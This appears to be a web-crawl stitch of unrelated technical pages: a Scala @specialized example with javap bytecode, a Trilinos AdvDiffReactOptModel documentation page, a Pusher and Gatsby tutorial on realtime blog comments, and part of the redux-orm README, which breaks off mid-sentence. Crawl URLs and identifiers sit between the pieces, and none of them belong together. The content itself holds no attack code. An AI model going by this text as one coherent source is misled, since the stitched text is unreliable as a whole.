import scala.annotation.tailrecobject Run { def main(args:Array[String]) { val A = new MList(List(1.,2.,3.)) val B = new MList(List(1,2,3)) println(A.sum) println(B.sum) }}
class MList[@specialized (Int,Double) T:Numeric](a:List[T]){ def sum(implicit num: Numeric[T]) = { import num._ @tailrec def sumHelper(a:List[T],total:T):T = { if (a.length == 0) total else sumHelper(a.tail, plus(a.head,total)) } sumHelper(a,zero) }}
javap -c -private MList\$mcI\$sp output
private final int sumHelper$3(scala.collection.immutable.List, int, scala.math.Numeric); Code: 0: aload_1 1: invokeinterface #56, 1; //InterfaceMethod scala/collection/LinearSeqOptimized.length:()I 6: iconst_0 7: if_icmpne 12 10: iload_2 11: ireturn 12: aload_1 13: invokeinterface #61, 1; //InterfaceMethod scala/collection/TraversableLike.tail:()Ljava/lang/Object; 18: checkcast #63; //class scala/collection/immutable/List 21: aload_3 22: aload_1 23: invokeinterface #68, 1; //InterfaceMethod scala/collection/IterableLike.head:()Ljava/lang/Object; 28: iload_2 29: invokestatic #50; //Method scala/runtime/BoxesRunTime.boxToInteger:(I)Ljava/lang/Integer; 32: invokeinterface #72, 3; //InterfaceMethod scala/math/Numeric.plus:(Ljava/lang/Object;Ljava/lang/Object;)Ljava/lang/Object; 37: invokestatic #38; //Method scala/runtime/BoxesRunTime.unboxToInt:(Ljava/lang/Object;)I 40: istore_2 41: astore_1 42: goto 0 | http://www.scala-lang.org/old/node/11774 | CC-MAIN-2014-15 | en | refinedweb |
#include <GLpApp_AdvDiffReactOptModel.hpp>
Inheritance diagram for GLpApp::AdvDiffReactOptModel:
The model evaluator subclass is used to represent the simulation-constrained optimization problem:
min g(x,p) s.t. f(x,p) = 0;
where:
xis the vector of discretized concentations of the species in the 2D domain.
pis the global vector of coefficients of a sine series basis (see
B_barbelow).
f(x,p) = A*x + reationRate*Ny(x) + B*(B_bar*p)is the discretized 2D diffusion/reaction PDE.
g(x,p) = 0.5 * (x-q)'*H*(x-q) + 0.5*regBeta*(B_bar*p)'*R*(B_bar*p)is the least squares objective function.
Ais the discretized Laplacian operator for the diffusion part of the PDE state equation. This matrix is constant, square and singular.
Bis the sensitivity of the flux boundary conditions. This is a constant rectangular matrix.
B_barare the sine series coefficients with a column dimension of
np.
Ny(x)is the nonlinear terms for the discretized reaction over the 2D domain.
reactionRateis the relative reaction rate which must take on a non-zero value to form a solvable problem.
His the symmetric positive definite mass matrix for the problem (i.e. the discretization of the inner product operator over the 2D domain).
qis a matching or target vector for the state
xover the 2D domain of the problem.
Ris the symmetric positive definite discretization of the inner product of the flux function over the boundary of the 2D domain.
regBetais a regularization parameter that must be greater than zero.
The nuts and bolts of the implementation for this problem are contained in the C++ class
GLpApp::GLpYUEpetraDataPool that was originally implemented by Denis Ridzal while a student at Rice University. The class
GLpApp::GLpYUEpetraDataPool implements the basic operators and nonlinear functions but this class puts them together to form a valid the model in terms of a model evaluator interface.
This example problem demonstrates a few different aspects of the
EpetraExt::ModelEvaluator interface:
How to manage parallel vector data. The state variables in
x are managed as fully distributed parallel data while the flux sine-series parameter coefficients
p are managed as locally replicated data.
Demonstrates shared compuation between the objective function
g(x,p) and the simulation equality constraints
f(x,p) and their derivatives. The intermediate vector
B_bar*p is computed only once and is shared with the computation of
g and
f. The intermediate vector
R*(B_bar*p) is computed once and shared between the computation of
g and
DgDp.
The functions
AdvDiffReactOptModel()
createInArgs(),
createOutArgs() and
evalModel() are fairly cleanly written and are appropriate to be studied in order to show how to implement other parallel simulation-constrained problems based on Epetra objects.
The mesh for the 2D domain can either be read in as a mesh data file give the files name or can be generated automatically on a square 2D domain.
The program
triangle can be used to generate meshes for arbitary 2D geometries and then
metis can be used to partition the mesh to multiple domains. Instructions for how to use
triangle and
metis to generate meshes is described ???here???.
Instead of reading in a mesh file, a square 2D mesh can be automatically generated given just the length in the
x and
y directions and the number of local elements in each direction. Currently, the square mesh is only partitioned in the
x direction and therefore will not demonstrate great parallel scalability for large numbers of processors due to excessive amounts of shared boundary between processes.
ToDo: Finish Documentation!
Definition at line 119 of file GLpApp_AdvDiffReactOptModel.hpp. | http://trilinos.sandia.gov/packages/docs/r7.0/packages/epetraext/doc/html/classGLpApp_1_1AdvDiffReactOptModel.html | CC-MAIN-2014-15 | en | refinedweb |
Add live comments in Gatsby
You will need Node and npm or Yarn installed on your machine. A basic understanding of JavaScript will be helpful.
According to Wikipedia, a static web page (sometimes called a flat page/stationary page) is a web page that is delivered to the user exactly as stored, in contrast to dynamic web pages which are generated by a web application
Gatsby is a modern static site generator that allows you to build static web pages using React and GraphQl. Getting started with Gatsby is pretty easy and its installation is an
npm install or
yarn install away.
Today we’ll be adding a realtime comment section to the sports blog we’ll be building. We’ll call our blog the “Football transfer buzz with Gordon Mc-gossip”.
Our application will contain a post and allow users to leave comments and everyone gets to see it in realtime.
Prerequisites
- Kindly ensure you have Node, Npm or Yarn installed on your machine before moving past this section. This will be needed for running and managing the dependencies needed by our application.
- Also, no knowledge of React is required, but a basic understanding of JavaScript may be helpful.
- Pusher: this is a framework that allows you to build realtime applications with its easy to use pub/sub messaging API.
- Gatsby: this is a static site generator. ( minimum version
"gatsby": "^1.9.247")
Install Gatsby
Installing Gatsby is pretty easy once you have Node installed on your machine. Simply run:
# for npm users npm i -g gatsby-cli
# for yarn users yarn global add gatsby-cli
This Gatsby CLI comes with a few helpful commands that can help you build and test your apps locally.
Create your app
To create our project, simply run:
# new gatsby project gatsby new gatsby-site-pusher
This will create our new project
Transfer-Buzz and install its dependencies. If you
cd into your new project directory, it will look like this.
Most of the work we’ll be doing would be in the
src/ directory. The components we’ll create would go into the
src/components directory and pages would go into the
src/pages directory.
Install dependency:
# for npm users npm i --save pusher-js
# for yarn users yarn add pusher-js
Get our Pusher credentials
If you don’t have a Pusher account already, kindly create one here. Once you have an account, simply head down to your dashboard and create an app. Once that is done, click on App Keys and note your credentials. We’ll be needing them in a bit.
Creating our app components
The first component we’ll create is our
CommentList component. This will be responsible for listing the comments left by users.
// src/components/comment-list.js import React from 'react' export default ({comments}) => { comments = comments.map((comment, i) => ( <div key={i} style={{ padding: '5px', border: '1px solid grey' }}> <p><strong>{comment.author}:</strong></p> <p>{comment.message}</p> </div> )) return ( <section> <strong>Comments: </strong>{comments} </section> ) }
This simply takes an array of comments with attributes
{author, message} and returns a
CommentList component.
Next, is the
Comment component, which will have a form for accepting new comments and list comments below.
// src/components/comment.js import React, { Component } from 'react' import CommentList from './comment-list' import Pusher from 'pusher-js' /** * initialize pusher with your credentials. * Get 'key' from pusher dashboard */ const pusher = new Pusher('key', { cluster: 'eu', encrypted: true }) // subscribe your pusher instance to the channel 'sport-buzz-news' const channel = pusher.subscribe('sport-buzz-news') /* global fetch */ export default class Comment extends Component { constructor (props) { super(props) this.state = { comments: [], author: '', message: '' } } /** * This will load components from the server on app startup, * and also subscribe our app to listen for updates */ async componentDidMount () { const comments = await fetch(' => res.json()) this.setState({comments: [...comments, ...this.state.comments]}) this.receiveUpdateFromPusher() } componentWillUnmount () { pusher.unsubscribe('sport-buzz-news') } /** * add new comments to the top of the list * once there's an update */ receiveUpdateFromPusher () { channel.bind('new-comment', comment => { this.setState({ comments: [comment, ...this.state.comments] }) }) console.log('app subscription to event successful') } handleChange (type, event) { if (type === 'author') { this.setState({author: event.target.value}) return } if (type === 'message') { this.setState({message: event.target.value}) } } /** * post comment to the server */ async postComment (author, message) { await fetch(' { body: JSON.stringify({author, message}), method: 'POST', headers: { 'user-agent': 'Mozilla/4.0 ', 'content-type': 'application/json' } }) } handleSubmit (event) { event.preventDefault() this.postComment(this.state.author, this.state.message) this.setState({author: '', message: ''}) } render () { return ( <div> <form onSubmit={this.handleSubmit.bind(this)}> <label> Name: <input type='text' value={this.state.author} onChange={this.handleChange.bind(this, 'author')} /> </label> <label> <br /> Message: <textarea type='text' value={this.state.message} onChange={this.handleChange.bind(this, 'message')} /> </label> <br /> <input type='submit' value='Submit' /> </form> <CommentList comments={this.state.comments} /> </div> ) } }
Here, when the component gets mounted, we try to load previous comments from the server and pass that data as
props to the
CommentList component.
Note: please remember to updated placeholders with your pusher credentials.
Putting content on our page
Open your
src/pages/index.js file which should already exist. You should replace its content with this:
// src/pages/index.js import React from 'react' import Comment from '../components/comment' const IndexPage = () => ( <div> <h1>Leroy Aziz Sané left out of German squad for the world cup</h1> <p> A lot of talks is currently ongoing about the Manchester City winger Leroy Sane being left out of the German team. He was a prolific player this season with Mancity winning the premier league andthe significant contribution he brought to the team in front of Goal. The decision by the German coach, Low to leave him out of the squad list was totally unexpected. Football really is a funny sport. </p> <p> Let me know your thoughts in the comment section below </p> <Comment /> </div> ) export default IndexPage
This contains a post we made and the
Comment component we imported above.
Getting data in Gatsby
Gatsby uses GraphQL for getting data. It could be from any source. There are a few files where changes need to be made to get data. We have
gatsby-node.js,
gatsby-browser.js,
gatsby-config.js among others.
What we’re concerned about right now is
gatsby-config.js. It is responsible for passing data down to our
src/components/header.js component. This gets data locally from the file and it’s an easy way to initialize your application with data.
Open up your
src/components/header.js file and you should see this:
// src/components/header.js import React from 'react' import Link from 'gatsby-link' const Header = ({ siteTitle }) => ( <div> </div> ) export default Header
It takes a prop called
siteTitle which was exported from the file
gatsby-config.js.
Feel free to go ahead and change the value for
title in
gatsby.js to
Football transfer buzz with Gordon Mc-Gossip'.
Setting up the server
Comments sent by users need to go somewhere, that’s what the server is for. It will save the comment, and publish it to Pusher who will trigger an update to all clients subscribed to that channel and listening for that event.
First, we’ll need to add the dependencies needed by our server.
# for yarn users yarn add express body-parser cors pusher
# for npm users npm i express body-parser cors pusher
Create the file
server.js and add the following:
//: 'key', secret: 'secret', cluster: 'eu', encrypted: true }) let comments = [ { author: 'robo', message: 'i totally didn\'t see that coming' } ] /** * receive new comment from the client * update the comments array with the new entry * publish update to Pusher */ app.post('/comment', function (req, res) { const {author, message} = req.body comments = [...[{author, message}], ...comments] pusher.trigger('sport-buzz-news', 'new-comment', {author, message}) res.sendStatus(200) }) // send all comments to the requester app.get('/comments', function (req, res) { res.json(comments) }) app.listen(port, function () { console.log('Node app is running at localhost:' + port) })
Here, we initialize Pusher with our credentials gotten from our dashboard. When we get a request on
localhost:8080/comments we return all comments gotten so far and receive comments sent to
POST localhost:8080/comment.
Running the app
We’ll use one of Gatsby’s helpful CLI commands to start our application. Simply run:
# gatsby cli command gatsby develop
This will start our application on port
8000 and can be accessed here
You’ll also need to start the server by running:
# start node server node server.js
Our server application will run on
and all API calls would go here.
More
Gatsby allows you to export as a static content when going to production. It could prefetch your data from any data source and bundle it into the generated static file.
To do that, simply run:
# make production build gatsby build
Gatsby will perform an optimized production build for your site generating static HTML and per-route JavaScript code bundles.
Conclusion
We’ve been able to build a simple blog application with a live comment section. This was done using Pusher and Gatsby.
The repo for this tutorial lives here. Feel free to contribute.
June 12, 2018
by Christian Nwamba | https://pusher.com/tutorials/realtime-comments-gatsby/ | CC-MAIN-2022-21 | en | refinedweb |
Get the Most Out of IBM Cloudant with Cross-Region Replication
1 min read
How to achieve full two-way replication between two data centre regions with IBM Cloudant.
If you run applications with customers in multiple regions of the world or run apps that are required to be resilient to the failure of whole data centre regions, you should consider IBM Cloudant for your data store.
IBM Cloudant has unique cross-region replication capabilities that allow you to maintain identical datasets that are always in sync in different parts of the world. That way, your users can be served faster by retrieving data from the dataset closest to them, and you can seamlessly failover between regions in the case of disaster or loss of connectivity.
Additionally, replicated datasets allow you to handle more traffic. If one region is configured to handle 500 queries per second, replicating to an identical second Cloudant service would add another 500 queries per second.
The ease of use and reliability of IBM Cloudant replication sets it apart from most other managed database services. And because of Cloudant's conflict-handling capabilities, you can rest assured that data is never lost, even if the same document is updated simultaneously from two different regions into replicated databases.
Obviously, a replicated service will increase your infrastructure costs (because you are provisioning double the capacity), but if these kinds of benefits are valuable to you, then the cost-benefit analysis will still be in your favour.
Two-way replication between two data centre regions
In this article, we will take you through the simple steps required to achieve full two-way replication between two data centre regions. These principles can be extended to replicate between three or more regions as well (see more details about complex replication topologies in this article).
We will also introduce a basic script to monitor replication and check that things are running smoothly. This script will be hosted on the IBM Code Engine service and run on a regular (cron) basis.
The following is what you will build:
This tutorial should take you less than an hour to complete. It will not be entirely cost-free because you can only set up one Cloudant service on the free tier and you will need two of them. If you deprovision the services after completing the tutorial, however, you should not have to pay more than a few dollars.
What you will need
- An IBM Cloud pay-as-you-go account.
- The IBM Cloud CLI (you also need to make sure that it is logged into your account).
- Git.
- Node.js and npm.
- Terraform: We will be using Terraform to deploy all the required infrastructure.
- Docker: We will be using Docker to create the images that will run your code in Code Engine — make sure you are logged into your Docker account.
- jq: This is a command-line utility to manipulate JSON data files.
- ccurl (or CouchDB curl) a command line utility to access couch-compatible services.
- Access to a Mac or Linux terminal.
To get the most out of this tutorial, you will need to be familiar with the basics of NodeJS, Terraform and Docker. But there is no deep expertise required of any of them.
Tutorial steps
- Create two instances of IBM Cloudant in separate geographical regions.
- Create secure replication access between them using an IAM ServiceID.
- Create one database in each Cloudant instance.
- Create a simple NodeJS script that sets up replication between these databases and then monitors the replication. This will be deployed to Code Engine, where it will run every minute.
- Change the data in the databases and watch it replicate.
Step 1: Obtain an API key to deploy infrastructure to your account
You will need some credentials to be able to deploy infrastructure programatically using Terraform. Follow the steps in this document to create an API key and make a note of it for Step 2.
Step 2: Clone the repo and cd into the Terraform directory
Now you are ready to create all the necessary parameters to run the infrastructure creation process from your machine. In a terminal, type the following:
This will copy all the project files into your local machine inside a directory called
cloudant-replication-in-a-box.
Now create a document called terraform.tfvars with the following fields:
The terraform.tfvars document contains variables that you may want to keep secret so it is ignored by the GitHub repository.
Step 3: Create the infrastructure
In this step, you will create the required infrastructure inside your IBM Cloud account.
TL;DR — Run the Terraform script:
In a bit more detail: The Terraform folder contains a number of simple scripts:
main.tftells Terraform to use the IBM Cloud.
variables.tfcontains the variable definitions whose values will be populated from terraform.tfvars.
cloudant.tfcreates the Cloudant DB instances in two different regions and some credentials that we will use later to access them
registry.tfcreates the Container Registry that will hold your container images for running in Code Engine.
iam.tfcreates the access key that is needed to interact with the Container Registry and the key that will be used to read and write between the Cloudant databases.
It will take several minutes for the databases and other resources to be ready, but you should now have two Cloudant database instances, a Container Registry namespace for your container images and some Identity and Access Management (IAM) credentials. You can check by visiting the Resources section of your IBM Cloud account.
Step 4: Create Cloudant databases and deploy monitoring scripts to Code Engine
Another thing the Terraform script does is output a bunch of configuration variables that we will now use.
We will run a bash script (
build.sh) that takes some of that output and uses it to create a database called
users in both of your Cloudant instances. It will also deploy a replication monitoring script (
monitor.js) to Code Engine that will run every minute and make sure that replication is working correctly.
Run the build script — but before you do, are you logged into the IBM Cloud CLI and Docker?
Go into the root of the project and type the following:
How replication works in Cloudant
Replication happens between databases (in our case between the
users databases in the Dallas and London regions). Every Cloudant instance has a special database in it called
_replicator that contains documents with replication instructions for each database you want to replicate. Each of these documents has a
source database (where you are replicating from) and a
target database (where you are replicating to). It also contains any necessary credentials that allow replication to occur between these databases. Here's an example of one such document:
The monitoring script
monitor.js is a simple NodeJS script. It builds up a replication document like the one above with data passed in as environment variables.
Then it checks whether the
_replicator database already contains this document (from its
_id). If it does not, it uploads the document to the
_replicator database. So the first time your script runs on Code Engine, the document will not exist and will get uploaded, thereby kicking off the replication process.
After that, the document will exist, but every time the script retrieves it, it will check what state it is in. If it is in any kind of error state, it will attempt to upload the document again, thereby trying to re-start the replication process. Error states can be caused by things like temporary loses of connectivity, expired credentials or other factors. This script is very simple, but it could be made more clever by, for example, generating alerts when it finds error states.
The script is running twice, once using London as the source and Dallas as the target and once using Dallas as the source and London as the target. Replication is happening both ways.
Note here that both documents could be uploaded to the same Cloudant instance; that is, the system knows that it needs to "push" to some other database and also "pull" from it. The best-practice recommendation is to have your replication documents in the instance that is the least active one. So if, for example, your London Cloudant is taking most of the application traffic, then put your replication documents in the Dallas instance. In this case, for simplicity, we have placed one document in each database.
Step 5: Watch your data replicate
The easiest way to your data replicate is in the Cloudant User interface.
From your resources list, click on the Launch Dashboard link of your cloudantDallas and cloudantLondon instances (open them in separate tabs so you can move between them):
From one of them (it doesn't matter which), click on the
users database and then on the Create Document button. In the editor, add a few fields and save the document. For example:
Now go to the other Cloudant instance, click into the
users database, and you should see the above document in there already. It's that quick.
Summary
In this tutorial we have demonstrated how easy it is to set up two-way replication between IBM Cloudant instances in two regions of the world. We have also implemented a basic monitoring script that ensures replication is working.
If high availability, whole-region disaster recovery and customer satisfaction are important factors in your application design, then you should be considering IBM Cloudant as your database.
Remember to decommission your resources so that you don't get charged additional fees. In the Terraform directory, type the following:
To remove the IBM Cloud Code Engine project, type the following:
If you want to get started with IBM Cloud Databases, check out all our current promotions here.
Follow IBM Cloud
Be the first to hear about news, product updates, and innovation from IBM Cloud.Email subscribeRSS | https://www.ibm.com/cloud/blog/get-the-most-out-of-ibm-cloudant-with-cross-region-replication | CC-MAIN-2022-21 | en | refinedweb |
Unsafe Lazy Resource.scala
I need an impure way (no IO) to create a resource atomically only once and later be able to know if it was created or not, so I can close this resource safely. 🤔
Jules Ivanic (@guizmaii) ⬇️ August 2, 2021
import scala.util.control.NonFatal /** Builds a "closeable" resource that's initialized on-demand. * * Works like a `lazy val`, except that the logic for closing * the resource only happens in case the resource was initialized. * * NOTE: it's called "unsafe" because it is side-effecting. * See homework. */ final class UnsafeLazyResource[A]( initRef: () => A, closeRef: A => Unit, ) extends AutoCloseable { /** Internal state that works like a FSM: * - `null` is for pre-initialization * - `Some(_)` is an active resource * - `None` is the final state, a closed resource */ @volatile private[this] var ref: Option[A] = null /** * Returns the active resources. Initializes it if necessary. * * @return `Some(resource)` in case the resource is available, * or `None` in case [[close]] was triggered. */ def get(): Option[A] = ref match { case null => // this.synchronized { if (ref == null) { try { ref = Some(initRef()) ref } catch { case NonFatal(e) => ref = None throw e } } else { ref } } case other => other } override def close(): Unit = if (ref ne None) { val res = this.synchronized { val old = ref ref = None old } res match { case null | None => () case Some(a) => closeRef(a) } } }
Example:
import java.io._ def openFile(path: File): UnsafeLazyResource[InputStream] = new UnsafeLazyResource( () => new FileInputStream(path), in => in.close() ) val lazyInput = openFile(new File("/tmp/file")) // .. later try { val in = lazyInput.get().getOrElse( throw new IllegalStateException("File already closed") ) //... } finally { lazyInput.close() }
Homework #
- Try using an AtomicReference instead of synchronizing a
var— not as obvious as you’d think — initialization needs protection, you’ll need an indirection 😉
- Try designing a pure API with Cats Effect’s Resource (you might need Ref and Deferred for your internals too)
| Written by Alexandru Nedelcu | https://alexn.org/blog/2021/08/02/unsafelazyresource-scala/ | CC-MAIN-2022-21 | en | refinedweb |
print statement checker plugin for flake8
Project description
Flake8 print plugin
Check for Print statements in python files.
This module provides a plugin for
flake8, the Python code checker.
Installation
You can install or upgrade
flake8-print with these commands::
$ pip install flake8-print $ pip install --upgrade flake8-print
Plugin for Flake8
When both
flake8 2.4.1 and
flake8-print are installed, the plugin is
available in
flake8::
$ flake8 --version 2.4.1 (pep8: 1.5.7, flake8-print: 2.0.0, mccabe: 0.3.1, pyflakes: 0.8.1)
Flake8 allows disabling some tests based on the folder:
[flake8] per-file-ignores = scripts/*: T20 cli.py: T20
Error codes
Changes
5.0.0 - 2022-04-30
- Move namespace from T0* to T2* to avoid collision with other library using same error code.
- Remove python 2 specific code paths, error messages and six usage.
4.0.1 - 2022-04-30
- Fixing bug with noqa detection by removing manual detection and relying on flake8 itself.
4.0.0 - 2020-11-29
- Opted back into using Poetry now that the existing issues have been fixed.
- Python 2.7 support was now officially dropped.
3.1.4 - 2019-1-11
- Fix bug introduced in 3.1.3
- Support for
nopep8comments
3.1.3 - 2019-31-10
- Swapped back from poetry to setup.py :(....python ecosystem issues....
- single function refactor code
3.1.1 - 2019-03-12
- Fix reading from stdin when it is closed (requires flake8 > 2.1).
- Add error codes to ReadMe.
- Swapped to poetry from setup.py
- Ran black on the repository
3.1.0 - 2018-02-11
- Add a framework classifier for use in pypi.org
- Fix entry_point in setup.py leaving it off by default again.
3.0.1 - 2017-11-06
- Fix conflict in setup.py leaving it off by default again.
- Fix bug in name code.
3.0.0 - 2017-11-05
- Remove some of the python 2/3 message differentiation.
- Use an AST rather than a logical line checker with a regex.
- pprint support.
- Loss of multiline noqa support, until there is a way to use both the AST and have flake8 provide the noqa lines.
2.0.2 - 2016-02-29
- Fix ReadMe for pipy
- Refactor, DRY it up.
- Update python 2 vs python 3 print statement styles.
2.0.1 - 2015-11-21
- Add back the decorator to fix the
flake8 --versioncall.
2.0 - 2015-11-10
- Support noqa at end of multiline print statement
- Performance improvements
- Removed PrintStatementChecker class and other functions
- Added T101 for 'Python 2.x reserved word print used.'
- Added testing for Python 3.3 and 3.5, and different flake8 versions
1.6.1 - 2015-05-22
- Fix bug introduced in 1.6.
1.6 - 2015-05-18
- Added proper support for python3 and testing for python 2.6, 2.7 and 3.4
1.5 - 2014-11-04
- Added python2.6 support. Thanks @zoidbergwill
1.4 - 2014-10-06
- Apped noqa support
1.3 - 2014-09-27
- Dropped noqa support
- Support for multiline comments and less false positives
1.2 - 2014-06-30
- Does not catch the word print in single line strings
- Does not catch inline comments with print in it
- Added tests
1.1 - 2014-06-30
- First release
1.0 - 2014-06-30
- Whoops
Project details
Release history Release notifications | RSS feed
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
flake8-print-5.0.0.tar.gz (5.2 kB view hashes) | https://pypi.org/project/flake8-print/ | CC-MAIN-2022-21 | en | refinedweb |
Type annotations for boto3.Support 1.23.0 service generated with mypy-boto3-builder 7.5.14
Project description
mypy-boto3-support
Type annotations for boto3.Support-support docs
See how it helps to find and fix potential bugs:
- mypy-boto3-support
-
Support.
From PyPI with pip
Install
boto3-stubs for
Support service.
# install with boto3 type annotations python -m pip install 'boto3-stubs[support]' # Lite version does not provide session.client/resource overloads # it is more RAM-friendly, but requires explicit type annotations python -m pip install 'boto3-stubs-lite[support]' # standalone installation python -m pip install mypy-boto3-support
How to uninstall
python -m pip uninstall -y mypy-boto3-support
Usage
VSCode
- Install Python extension
- Install Pylance extension
- Set
Pylanceas your Python Language Server
- Install
boto3-stubs[support]in your environment:
python -m pip install 'boto3-stubs[support]'
Both type checking and code completion should now work. No explicit type
annotations required, write your
boto3 code as usual.
PyCharm
Install
boto3-stubs-lite[support] in your environment:
python -m pip install 'boto3-stubs-lite[support]'`[support]'
-[support]with services you use in your environment:
python -m pip install 'boto3-stubs[support]'
-[support]in your environment:
python -m pip install 'boto3-stubs[support]'`
Type checking should now work. No explicit type annotations required, write
your
boto3 code as usual.
pyright
- Install
pyright:
npm i -g pyright
- Install
boto3-stubs[support]in your environment:
python -m pip install 'boto3-stubs[support]'
Optionally, you can install
boto3-stubs to
typings folder.
Type checking should now work. No explicit type annotations required, write
your
boto3 code as usual.
Explicit type annotations
Client annotations
SupportClient provides annotations for
boto3.client("support").
from boto3.session import Session from mypy_boto3_support import SupportClient client: SupportClient = Session().client("support") # now client usage is checked by mypy and IDE should provide code completion
Paginators annotations
mypy_boto3_support.paginator module contains type annotations for all
paginators.
from boto3.session import Session from mypy_boto3_support import SupportClient from mypy_boto3_support.paginator import ( DescribeCasesPaginator, DescribeCommunicationsPaginator, ) client: SupportClient = Session().client("support") # Explicit type annotations are optional here # Type should be correctly discovered by mypy and IDEs # VSCode requires explicit type annotations describe_cases_paginator: DescribeCasesPaginator = client.get_paginator("describe_cases") describe_communications_paginator: DescribeCommunicationsPaginator = client.get_paginator("describe_communications")
Literals
mypy_boto3_support.literals module contains literals extracted from shapes
that can be used in user code for type checking.
from mypy_boto3_support.literals import ( DescribeCasesPaginatorName, DescribeCommunicationsPaginatorName, SupportServiceName, ServiceName, ResourceServiceName, PaginatorName, ) def check_value(value: DescribeCasesPaginatorName) -> bool: ...
Typed dictionaries
mypy_boto3_support.type_defs module contains structures and shapes assembled
to typed dictionaries for additional type checking.
from mypy_boto3_support.type_defs import ( AddAttachmentsToSetRequestRequestTypeDef, AddAttachmentsToSetResponseTypeDef, AddCommunicationToCaseRequestRequestTypeDef, AddCommunicationToCaseResponseTypeDef, AttachmentDetailsTypeDef, AttachmentTypeDef, CaseDetailsTypeDef, CategoryTypeDef, CommunicationTypeDef, CreateCaseRequestRequestTypeDef, CreateCaseResponseTypeDef, DescribeAttachmentRequestRequestTypeDef, DescribeAttachmentResponseTypeDef, DescribeCasesRequestDescribeCasesPaginateTypeDef, DescribeCasesRequestRequestTypeDef, DescribeCasesResponseTypeDef, DescribeCommunicationsRequestDescribeCommunicationsPaginateTypeDef, DescribeCommunicationsRequestRequestTypeDef, DescribeCommunicationsResponseTypeDef, DescribeServicesRequestRequestTypeDef, DescribeServicesResponseTypeDef, DescribeSeverityLevelsRequestRequestTypeDef, DescribeSeverityLevelsResponseTypeDef, DescribeTrustedAdvisorCheckRefreshStatusesRequestRequestTypeDef, DescribeTrustedAdvisorCheckRefreshStatusesResponseTypeDef, DescribeTrustedAdvisorCheckResultRequestRequestTypeDef, DescribeTrustedAdvisorCheckResultResponseTypeDef, DescribeTrustedAdvisorCheckSummariesRequestRequestTypeDef, DescribeTrustedAdvisorCheckSummariesResponseTypeDef, DescribeTrustedAdvisorChecksRequestRequestTypeDef, DescribeTrustedAdvisorChecksResponseTypeDef, PaginatorConfigTypeDef, RecentCaseCommunicationsTypeDef, RefreshTrustedAdvisorCheckRequestRequestTypeDef, RefreshTrustedAdvisorCheckResponseTypeDef, ResolveCaseRequestRequestTypeDef, ResolveCaseResponseTypeDef, ResponseMetadataTypeDef, ServiceTypeDef, SeverityLevelTypeDef, TrustedAdvisorCategorySpecificSummaryTypeDef, TrustedAdvisorCheckDescriptionTypeDef, TrustedAdvisorCheckRefreshStatusTypeDef, TrustedAdvisorCheckResultTypeDef, TrustedAdvisorCheckSummaryTypeDef, TrustedAdvisorCostOptimizingSummaryTypeDef, TrustedAdvisorResourceDetailTypeDef, TrustedAdvisorResourcesSummaryTypeDef, ) def get_structure() -> AddAttachmentsToSetRequestRequest-support. | https://pypi.org/project/mypy-boto3-support/ | CC-MAIN-2022-21 | en | refinedweb |
redux-ormredux-orm
A small, simple and immutable ORM to manage relational data in your Redux store.
See a a guide to creating a simple app with Redux-ORM (includes the source). Its README is not updated for 0.9 yet but the code has a branch for it.
The 0.9 which is in the release candidate stage, brings big breaking changes to the API. Please look at the migration guide if you're migrating from earlier versions.
Looking for the 0.8 docs? Read the old README.md in the repo. For the API reference, clone the repo,
npm install,
make build and open up
index.html in your browser. Sorry for the inconvenience.
API can be unstable until 1.0.0. Minor version bumps before 1.0.0 can and will introduce breaking changes. They will be noted in the changelog.
ExtensionsExtensions
redux-orm-proptypes: React PropTypes validation and defaultProps mixin for Redux-ORM Models
InstallationInstallation
npm install redux-orm --save
Or with a script tag
<script src="
UsageUsage
Declare Your ModelsDeclare Your Models
You can declare your models with the ES6 class syntax, extending from
Model. You need to declare all your non-relational fields on the Model, and declaring all data fields is recommended as the library doesn't have to redefine getters and setters when instantiating Models.
redux-orm supports one-to-one and many-to-many relations in addition to foreign keys (
oneToOne,
many and
fk imports respectively). Non-related properties can be accessed like in normal JavaScript objects.
// models.js import {fk, many, attr, Model} from 'redux-orm'; class Book extends Model { toString() { return `Book: ${this.name}`; } // Declare any static or instance methods you need. } Book.modelName = 'Book'; // Declare your related fields. Book.fields = { id: attr(), // non-relational field for any value; optional but highly recommended name: attr(), authors: many('Author', 'books'), publisher: fk('Publisher', 'books'), };
Register Models and Generate an Empty Database StateRegister Models and Generate an Empty Database State
Defining fields on a Model specifies the table structure in the database for that Model. In order to generate a description of the whole database's structure, we need a central place register all Models we want to use.
An instance of the ORM class registers Models and handles generating a full schema from all the models and passing that information to the database. Often you'll want to have a file where you can import a single ORM instance across the app, like this:
// orm.js import { ORM } from 'redux-orm'; import { Book, Author, Publisher } from './models'; const orm = new ORM(); orm.register(Book, Author, Publisher); export default orm;
You could also define and register the models to an ORM instance in the same file, and export them all.
Now that we've registered Models, we can generate an empty database state. Currently that's a plain, nested JavaScript object that is structured similarly to relational databases.
// index.js import orm from './orm'; const emptyDBState = orm.getEmptyState();
Applying Updates to the DatabaseApplying Updates to the Database
When we have a database state, we can start an ORM session on that to apply updates. The ORM instance provides a
session method that accepts a database state as it's sole argument, and returns a Session instance.
const session = orm.session(emptyDBState);
Session-specific classes of registered Models are available as properties of the session object.
const Book = session.Book;
Models provide an interface to query and update the database state.
Book.withId(1).update({ name: 'Clean Code' }); Book.all().filter(book => book.name === 'Clean Code').delete(); Book.hasId(1) // false
The initial database state is not mutated. A new database state with the updates applied can be found on the
state property of the Session instance.
const updatedDBState = session.state;
Redux IntegrationRedux Integration
To integrate Redux-ORM with Redux at the most basic level, you can define a reducer that instantiates a session from the database state held in the Redux atom, then when you've applied all of your updates, you can return the next state from the session.
import { orm } from './models'; function ormReducer(dbState, action) { const sess = orm.session(dbState); // Session-specific Models are available // as properties on the Session instance. const { Book } = sess; switch (action.type) { case 'CREATE_BOOK': Book.create(action.payload); break; case 'UPDATE_BOOK': Book.withId(action.payload.id).update(action.payload); break; case 'REMOVE_BOOK': Book.withId(action.payload.id); } // the state property of Session always points to the current database. // Updates don't mutate the original state, so this reference is not // equal to `dbState` that was an argument to this reducer. return sess.state; }
Previously Redux-ORM advocated for reducers specific to Models by attaching a static
reducer function on the Model class. If you want to define your update logic on the Model classes, you can specify a
reducer static method on your model which accepts the action as the first argument, the session-specific Model as the second, and the whole session as the third.
class Book extends Model { static reducer(action, Book, session) { switch (action.type) { case 'CREATE_BOOK': Book.create(action.payload); break; case 'UPDATE_BOOK': Book.withId(action.payload.id).update(action.payload); break; case 'REMOVE_BOOK': const book = Book.withId(action.payload); book; } // Return value is ignored. return undefined; } toString() { return `Book: ${this.name}`; } }
To get a reducer for Redux that calls these
reducer methods:
